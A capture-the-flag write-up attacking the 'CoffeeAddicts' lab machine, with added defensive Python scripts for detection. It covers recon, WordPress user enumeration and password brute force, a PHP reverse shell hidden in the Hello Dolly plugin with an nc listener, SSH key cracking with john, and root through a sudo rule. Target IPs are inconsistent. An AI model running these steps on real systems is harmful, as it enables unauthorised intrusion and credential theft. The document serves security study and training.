How I took down CoffeeAddicts Machine

Overview:

Target Machine IP Address: 192.168.56.108
My Machine IP Address: 192.168.56.1

Mission:

Boot to Root

1. To get user flag
2. To get root flag
3. To get root access

Level: Easy/Medium 

Download:

You can download the machine from here.

************************************

Information Gathering & Scanning Process:

sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Target IP: 192.168.56.128

nmap -sC -sV -p- -Pn 192.168.56.128 -o nmap.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 fc:13:6a:6b:9b:e3:68:18:24:a1:de:2b:28:1e:61:5f (RSA)
| 256 c1:34:94:94:71:71:9c:6e:83:a6:be:c9:2a:1b:3f:d7 (ECDSA)
|_ 256 9a:cc:ce:ce:b8:2f:08:bb:2b:99:b6:25:3f:ec:44:61 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1. HTTP (80/tcp)

I made an entry in my /etc/hosts as mentioned here, and then visited the site URL http://coffeeaddicts.thm/

Let’s view the source code.

Decode the string. If you are wondering why I assume the string is base64: almost 99% of the time, a string that ends with “==” is base64. Besides, you can use other tools to identify the encoding as well.

echo "VEhNe2ltX3RoZV9saXphcmRfa2luZ30gaHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==" | base64 -d

THM{im_the_lizard_king} https://www.youtube.com/watch?v=dQw4w9WgXcQ

I am not sure whether the string is just bogus or a sub-directory name. Let’s make a note of it and then enumerate the directories.
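As an added example (not part of the original writeup), the following Python script turns the manual base64 -d step above into a check a site owner can run over their own page source: it finds every base64-looking token in an HTML document, decodes the ones that are valid base64, and keeps only those that decode to readable text, which is how a note or credential left in an HTML comment would surface. The sample page is constructed here; it embeds the comment string from this writeup plus a binary data: URI as a decoy that must not be reported.

```python
import base64
import binascii
import re

# Constructed sample page source (not captured from the target). It carries the
# encoded comment from the writeup and a base64 PNG data: URI as a decoy.
SAMPLE_HTML = """<html><body>
<!-- VEhNe2ltX3RoZV9saXphcmRfa2luZ30gaHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ== -->
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==">
<p>Welcome to CoffeeAddicts. Visit /wordpress/ for the blog.</p>
</body></html>"""

# A base64 token: at least four 4-character groups from the base64 alphabet
# (16+ chars, so ordinary words do not match), optional '=' padding, and no
# alphabet character directly before or after it.
B64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/])"
    r"(?:[A-Za-z0-9+/]{4}){4,}"
    r"(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"
    r"(?![A-Za-z0-9+/=])"
)


def decode_if_text(token):
    """Return the decoded string if `token` is valid base64 that decodes to
    printable UTF-8 text; return None for invalid base64 or binary payloads."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def find_encoded_text(html):
    """Return (token, decoded) pairs for every base64 blob in `html` that hides
    readable text. Images and other binary blobs are skipped."""
    hits = []
    for match in B64_TOKEN.finditer(html):
        decoded = decode_if_text(match.group(0))
        if decoded is not None:
            hits.append((match.group(0), decoded))
    return hits


if __name__ == "__main__":
    for token, decoded in find_encoded_text(SAMPLE_HTML):
        print(f"{token[:24]}... -> {decoded}")
```

The same function can be pointed at a crawl of your own site (for example the saved output of wget -r) to catch encoded strings that should never have shipped.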

gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -o gobuster.log

dirsearch -u http://coffeeaddicts.thm -e .html,.php,.txt,.php.bak,.bak,.zip -w /usr/share/wordlists/dirb/common.txt -f

Yes, we found that there is a WordPress instance: http://coffeeaddicts.thm/wordpress/

I know the username is gus (it is shown under each article; if you want to do it more technically, you can request http://coffeeaddicts.thm/wordpress/?author=1), or you can use wpscan and try the following command:

wpscan --url http://coffeeaddicts.thm/wordpress/ --plugins-detection aggressive -e u -o wpscan_u.log

By the way, it looks like there is a password hint. However, I must confess that I can’t make anything out of it. That’s why I thought I would first try rockyou.txt as the password list and do a wpscan brute force.

It has been close to 50 minutes but I didn’t get anything, so I thought I would let it run while I do manual enumeration.

password: gusineedyouback
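From the defender’s side, both steps just described (the ?author=N user enumeration and a long wp-login.php password-guessing run) leave a clear trail in the web server’s access log. As an added example that is not part of the original writeup, the following Python script parses Apache combined-format log lines and flags a client that probes several author IDs or sends a burst of POSTs to wp-login.php within a short window. The log lines are constructed inline (the timestamps, the second client 10.0.0.7 and the thresholds are assumptions) and are not captured from the target.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format: client, identd, user, [time], "request", status, bytes, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

AUTHOR_SCAN_MIN = 2    # distinct ?author= values from one client (assumed threshold)
LOGIN_BURST_MIN = 10   # POSTs to wp-login.php from one client inside the window (assumed threshold)
WINDOW_SECONDS = 60


def build_sample_log():
    """Constructed Apache log lines (not captured from the target) modelling an
    author-ID scan and a password-guessing burst, plus one legitimate login."""
    fmt = '{ip} - - [10/Jan/2022:10:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'
    lines = []
    for n in range(1, 4):   # author=1 redirects to the author page, others 404
        lines.append(fmt.format(ip="192.168.56.1", sec=n, method="GET",
                                path=f"/wordpress/?author={n}", status=301 if n == 1 else 404))
    for sec in range(10, 25):   # 15 login POSTs in 15 seconds
        lines.append(fmt.format(ip="192.168.56.1", sec=sec, method="POST",
                                path="/wordpress/wp-login.php", status=200))
    lines.append(fmt.format(ip="10.0.0.7", sec=30, method="POST", path="/wordpress/wp-login.php", status=302))
    lines.append(fmt.format(ip="10.0.0.7", sec=31, method="GET", path="/wordpress/wp-admin/", status=200))
    return lines


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines):
    """Return sorted (ip, finding, count) tuples for author enumeration and login bursts."""
    author_ids = defaultdict(set)
    login_posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = re.search(r"[?&]author=(\d+)", rec["path"])
        if m and rec["method"] == "GET":
            author_ids[rec["ip"]].add(int(m.group(1)))
        if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            login_posts[rec["ip"]].append(rec["ts"])

    findings = []
    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_SCAN_MIN:
            findings.append((ip, "author_enumeration", len(ids)))
    for ip, stamps in login_posts.items():
        stamps.sort()
        # Sliding window: the largest number of POSTs inside any WINDOW_SECONDS span.
        best, start = 0, 0
        for end in range(len(stamps)):
            while (stamps[end] - stamps[start]).total_seconds() > WINDOW_SECONDS:
                start += 1
            best = max(best, end - start + 1)
        if best >= LOGIN_BURST_MIN:
            findings.append((ip, "wp_login_bruteforce", best))
    return sorted(findings)


if __name__ == "__main__":
    for ip, kind, count in detect(build_sample_log()):
        print(f"{ip}: {kind} ({count} events)")
```

Counting POSTs rather than failed statuses matters here: a wrong WordPress password still returns 200 with the login form, so status codes alone do not separate guesses from successes; the legitimate client in the sample produces a single POST followed by a 302 and is not flagged.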

I tried my favourite technique, which is to hide the content of php-reverse-shell.php inside 404.php; however, this time, I am not sure why, I couldn’t. Thanks to this, I found a new way to hide the script: I hid it within the Hello Dolly plugin. Nevertheless, you should be careful not to overwrite the plugin’s comment header (which already exists in the plugin).

Yes, you need to modify the IP address on which you are going to receive the reverse connection from the target machine. I usually keep the default port number.

On the Kali machine, type the following command:

nc -lvp 1234

As soon as I activated the Hello Dolly plugin, I got the reverse connection on the Kali machine.

I see that there are two users…

Users:

badbyte 
gus

user flag: THM{s4v3_y0uR_Cr3d5_b0i}

I did cd badbyte and saw that .ssh contains a private SSH key, but it is password protected. Therefore, I had to google it, and I found this article useful.

sudo updatedb

locate ssh2john 
cp /usr/share/john/ssh2john.py .
python ssh2john.py id_rsa > id_rsa.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

john --show id_rsa.hash

Password: password

ssh badbyte@192.168.56.108 -i id_rsa

sudo -l

(root) /opt/BadByte/shell
sudo /opt/BadByte/shell   # remember the password is password
bash
cd /root
cat root.txt

root flag: THM{im_the_shell_master}
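The rule that gave root here, a custom binary under /opt that badbyte may run as root, is exactly what a sudoers review should catch. As an added example that is not part of the original writeup, this Python script parses the output of sudo -l and reports rules worth reviewing: an unrestricted ALL, shells or interpreters, commands outside the standard system directories, and NOPASSWD tags. The sample output is constructed: the hostname, the Defaults line and every rule except (root) /opt/BadByte/shell are assumptions added to exercise each check.

```python
import re

# Constructed `sudo -l` output. Only the /opt/BadByte/shell rule comes from the
# writeup; the hostname, Defaults line and other rules are assumptions.
SAMPLE_SUDO_L = """\
Matching Defaults entries for badbyte on coffeeaddicts:
    env_reset, mail_badpass, secure_path=/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User badbyte may run the following commands on coffeeaddicts:
    (root) /opt/BadByte/shell
    (root) NOPASSWD: /usr/bin/apt-get update
    (ALL : ALL) ALL
    (root) /usr/bin/systemctl status nginx
"""

# "(runas) TAG: TAG: command, command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Binaries that hand the caller an interactive shell or arbitrary code execution.
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby"}
# Package-managed locations; anything else is a locally built binary nobody else has reviewed.
STANDARD_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/local/bin/", "/usr/local/sbin/")


def parse_rules(text):
    """Extract the command rules that follow the 'may run the following commands' line."""
    rules = []
    in_cmds = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "tags": m.group("tags").split(),
                          "cmd": cmd.strip()})
    return rules


def assess(rule):
    """Return the reasons this rule deserves review (empty list if it looks fine)."""
    reasons = []
    cmd = rule["cmd"]
    exe = cmd.split()[0] if cmd else ""
    if cmd == "ALL":
        reasons.append("unrestricted ALL")
    elif exe.rsplit("/", 1)[-1] in SHELLS:
        reasons.append("runs a shell or interpreter")
    elif not exe.startswith(STANDARD_DIRS):
        reasons.append("custom binary outside system paths (audit its behaviour)")
    if "NOPASSWD:" in rule["tags"]:
        reasons.append("no password required")
    return reasons


def audit(text):
    """Return (command, reasons) for every rule in `sudo -l` output that needs review."""
    findings = []
    for rule in parse_rules(text):
        reasons = assess(rule)
        if reasons:
            findings.append((rule["cmd"], reasons))
    return findings


if __name__ == "__main__":
    for cmd, reasons in audit(SAMPLE_SUDO_L):
        print(f"{cmd}: {'; '.join(reasons)}")
```

Run against real output (sudo -l -U username as an administrator), the flagged /opt binary is the one to open up: a helper that spawns a shell, as this one does, is equivalent to granting ALL.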

That’s all guys 🙂

 
